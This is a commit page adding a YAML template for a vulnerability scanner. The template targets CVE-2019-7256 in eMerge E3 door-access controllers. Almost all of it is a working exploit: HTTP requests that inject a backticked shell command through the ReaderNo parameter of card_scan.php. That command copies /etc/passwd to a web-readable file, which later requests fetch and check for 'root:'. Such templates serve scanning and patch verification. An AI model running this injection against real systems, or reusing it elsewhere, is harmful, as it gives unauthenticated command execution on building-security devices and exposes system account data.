Create CVE-2019-7256.yaml

2020-09-06 11:55:23 +00:00 · 2020-09-06 11:55:23 +00:00 · 06c45b8a8d
parent c62950eec5
commit 06c45b8a8d
1 changed files with 63 additions and 0 deletions
--- a/cves/CVE-2019-7256.yaml
+++ b/cves/CVE-2019-7256.yaml
@ -0,0 +1,63 @@
+id: CVE-2019-7256
+
+info:
+  name: eMerge E3 1.00-06 - Remote Code Execution
+  author: pikpikcu
+  severity: critical
+
+# Vendor Homepage: http://linear-solutions.com/nsc_family/e3-series/
+# Software Link: http://linear-solutions.com/nsc_family/e3-series/
+# Refrence: https://www.exploit-db.com/exploits/47619
+
+requests:
+  - raw:  # Default Port
+      - | #Sending Command
+        GET /card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20nuclei.txt%60 HTTP/1.1
+        Host: {{Hostname}}:9000
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+        Accept-Language: en-US,en;q=0.5
+        Accept-Encoding: gzip, deflate
+        DNT: 1
+        Connection: close
+        Upgrade-Insecure-Requests: 1
+      - | #Get Root 
+        GET /nuclei.txt HTTP/1.1
+        Host: {{Hostname}}:9000
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+        Accept-Language: en-US,en;q=0.5
+        Accept-Encoding: gzip, deflate
+        DNT: 1
+        Connection: close
+        Upgrade-Insecure-Requests: 1
+
+ #######        
+      - | 
+        GET /card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20nuclei.txt%60 HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+        Accept-Language: en-US,en;q=0.5
+        Accept-Encoding: gzip, deflate
+        DNT: 1
+        Connection: close
+        Upgrade-Insecure-Requests: 1
+      - | 
+        GET /nuclei.txt HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+        Accept-Language: en-US,en;q=0.5
+        Accept-Encoding: gzip, deflate
+        DNT: 1
+        Connection: close
+        Upgrade-Insecure-Requests: 1
+
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        word:
+          - "root:"